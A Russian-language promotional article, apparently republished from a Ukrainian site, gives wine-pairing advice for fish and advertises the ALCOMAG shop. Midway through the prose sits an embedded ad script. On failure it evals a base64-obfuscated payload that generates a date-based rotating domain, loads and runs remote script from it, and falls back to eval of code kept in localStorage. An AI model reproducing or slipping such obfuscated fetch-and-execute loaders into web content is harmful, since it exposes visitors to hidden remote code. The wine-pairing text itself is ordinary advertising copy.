Рыбный пейринг: подбираем удачные сочетания к вину вместе с ALCOMAG

Вино считается одним из наиболее гастрономичных напитков, а большое разнообразие его вкусов и стилей открывает огромные возможности для создания интересных пар. Сегодня хотим подробнее расспросить экспертов ALCOMAG о том, как подбирать вино к рыбе, которая традиционно считается одной из самых удачных закусок к этому напитку. Но во всем есть свои нюансы. Давайте разбираться.

Рекомендуем купить вино на этом сайте ALCOMAG – здесь представлена огромная коллекция разноплановых напитков на любой вкус и бюджет с быстрой доставкой по всей Украине.

Общие рекомендации

Простые блюда с понятным вкусом лучше сопроводить более ярким и необычным вином, но держите баланс: напиток должен дополнять вкус еды, а не заглушать его.Если вы любите готовить пряную рыбу с изобилием приправ и специй, лучше остановить свой выбор на вине с интенсивным вкусом, поскольку легкие и деликатные вина попросту потеряются на фоне такой закуски.В целом, с рыбными блюдами лучше гармонируют молодые вина со свежим вкусом.Прежде чем подать к рыбе красное вино с хорошо ощутимыми танинами, подумайте дважды. Красные вина очень редко становятся удачной парой вместе с рыбой, поскольку из-за них у этого блюда появляется неприятный привкус.

Ценителям интересных белых сортов советуем обратить внимание на вина Германии – они отличаются самобытным характером, легкостью и свежестью.

Как составлять гастрономическую пару с рыбой

Чтобы удачно подобрать вино к рыбному блюду, лучше учесть несколько факторов: особенности приготовления блюда, использованный соус, происхождение рыбы. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Если рыба жирная, советуем подать ее с белым сухим вином, которое имеет повышенную кислотность.

Семга и тунец идеально сочетаются с молодыми розовыми винами, речные разновидности рыб хорошо раскрывают свой вкус вместе с мягкими по вкусу сухими винами. Филе лосося станет идеальной парой для сухого Пино Гри, если вы подали к столу пряную красную рыбу, самое время применить исключение из правил и подать к ней легкое красное вино, например, Пино Нуар. Ну а к жареной рыбе хорошо подойдут такие насыщенные вина как Гренаш или Зинфандель.

Если речь идет о весьма неординарном вкусе копченой рыбы, советуем подать к ней белое вино Гевюрцтраминер, которое имеет приятную кислотность. Также такие образцы будут хорошо сочетаться со свежим фруктовым вкусом вина Совиньон Блан.

При выборе любой гастрономической пары нельзя забывать о соусе. К рыбным блюдам, приготовленным под сливочным соусом, эксперты советуют подавать Шардоне, а с чесночным и другим пикантным вариантам хорошо подойдет Рислинг, Пино Гри или Траминер. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/rybnyj-pejring-podbiraem-udachnye-sochetaniya-k-vinu-vmeste-s-alcomag/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top